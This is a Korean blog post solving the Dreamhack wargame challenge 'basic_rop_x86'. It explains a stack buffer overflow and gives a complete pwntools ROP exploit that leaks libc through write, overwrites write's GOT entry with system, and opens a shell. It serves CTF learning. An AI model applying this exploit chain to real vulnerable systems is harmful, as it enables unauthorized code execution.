basic_rop

🌇│System_Study/📕│Dreamhack_Hacking

basic_rop_x86

Jastes 2022. 10. 30. 23:50

basic_rop_x86

문제 풀이

NX와 Partial RELRO가 걸려있네요 그리고 코드를 접근해보면
Canary는 적용되어 있지 않네요 다행이예요

코드를 보시면 이전 내용이랑 유사한 방법이네요 read()함수에 bof가 발생하니까요
그럼 실제로 어떤 식으로 메모리를 할당되었는지도 확인해봅시다.

실제로는 0x44로 잡혀있네요

Exploit 설계

그럼 저희는 이전에 했던 거처럼 system()함수의 주소를 알아내어 최종적으로 system("/bin/sh") 호출!
그러기 위해 read()함수와 write()를 사용할 것입니다. 실제 주소를 leak하는 방식은
이전에 배웠으므로 생략하겠습니다.

그 다음으로 저희는 rop chain을 이용해 overwirte 해주고 이번엔 bss 영역을 활용하여 접근할거예요
참고로 bss 영역을 사용할 수 있는 이유는 Paritial RELRO 때문인데 추후에 배울 내용이니까 넘어가죠

Exploit

메모리의 크기도 알아보았고 32bit의 OS이므로 그의 함수 호출에 따라
bof의 발생시키는 최소한 데이터 크기 0x48(buf+sfp) 그리고 위 형식을 보시면 canary가 안 걸려있죠
이전에 푼 문제는 return to scu라는 공격기법인데 이는 추후 정리하겠습니다.
그러기에 rop의 형식인 return gadget을 이용해 풀어보겠습니다.

다양한 gadget 방식이 있으나 시간 관계상 툴을 사용하였습니다.
저희가 이전에 pwntools를 사용해 check_lib의 형식으로 알아보았는데 여기서는 그런 문제가 없는 듯 싶기에
그냥 풀어봤다는 점 유의해주세요 ㅠ

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98 #!usr/python3
from pwn import *
import sys
 
Host = 'host3.dreamhack.games'
File_Name = './basic_rop_x86'
 
if(args['REMOTE']):
    p = remote(Host, sys.argv[1])
else:
    p = process(File_Name)
 
#default Setting
e = ELF(File_Name, checksec=False)
libc = ELF('./libc.so.6', checksec=False)
context(arch='i386', os='linux')
#context.cyclic_alphabet = "A"
context.log_level = 'debug'
#gdb.attack()
 
def slog(func_name, func_addr): return success(" : ".join([func_name, hex(func_addr)]))
 
def main():
    #ROP default setting
    read_got = e.got["read"]
    read_plt = e.plt["read"]
    
    write_got = e.got["write"]
    write_plt = e.plt["write"]
 
    main = e.symbols['main']
 
    read_offset = libc.symbols["read"]
    write_offset = libc.symbols['write']
    system_offset = libc.symbols["system"]
    
    binsh = e.bss()
    pppr = 0x08048689 #pop esi; pop edi; pop ebp; ret
 
    '''payload in buffer(buf~ebp : 0x44 | sfp : 0x4 | read_plt | puts_plt_ret.. 0x4 | puts_got 0x4)'''
    
    #payload = cyclic(68) # 0x44
    payload = b'A'*0x44 + b'B'*0x4
 
    # write(1, read_got, 0x4)
    payload += p32(write_plt)
    payload += p32(pppr)
    payload += p32(1)
    payload += p32(read_got)
    payload += p32(4)
 
    # read(0, binsh, 0x8)
    payload += p32(read_plt)
    payload += p32(pppr)
    payload += p32(0)
    payload += p32(binsh)
    payload += p32(8)
 
    # read(0, write_got, 0x4)
    payload += p32(read_plt)
    payload += p32(pppr)
    payload += p32(0)
    payload += p32(write_got)
    payload += p32(4)
 
    # write("/bin/sh")
    payload += p32(write_plt)
    payload += p32(0)
    payload += p32(binsh)
 
    p.send(payload)
    p.recvuntil('A'*0x40)
    
    #read_addr
    read_addr = u32(p.recvn(4))
 
    #libc_base pointer
    lib_base = read_addr - read_offset
    slog('lib_base_addr', lib_base)
    #log.info(f'libc_base_addr : {hex(lib_base)}')
 
    #other libc_func
    write_addr = lib_base + write_offset
    system_addr = lib_base + system_offset
    
    #log.info(f'read_addr " {hex(read_addr))}')
    slog('read_addr', read_addr)
    slog('write_addr', write_addr)
    slog('system', system_addr)
 
    p.send(b"/bin/sh\x00")
    p.sendline(p32(system_addr))
 
    p.interactive()
 
if __name__ == '__main__':
    main()
 
Colored by Color Scripter cs

exploit 코드를 간단히 설명하자면 우선 buf의 시작부터 ebp까지 그리고 sfp까지 채운 것이 시작으로
ret 부분을 write()의 plt로 덮었습니다. 그래서 main이 끝나면 자연스럽게 write()로
또한 write의 인자는 pop을 3개 사용하기에 해당 gadget의 필요한 주소를 넣었습니다.

이전에 했던 형식 그리고 syscall의 형태를 참고 받아서 채웠습니다.
그러면 lib의 주소를 확인 해당 나머지 주소도 확인할 수 있습니다. 그 세부적인 내용은
이전에 확인해봤으므로 간단히 lib base = 실제 주소 - offset인 형태예요
그럼 system의 주소는 lib_base + system offset을 하면 되겠죠

나머지는 찬찬히 chain rtl를 사용하여 system의 주소를 확인 후 system()주소를 write() got로 ret
write()에 bss(임시 데이터 값 등)에 "/bin/sh" 문자열을 담아주고 write("/bin/sh")을 해주면 끝!

참고 자료

참고 이미지

저작자표시 비영리 변경금지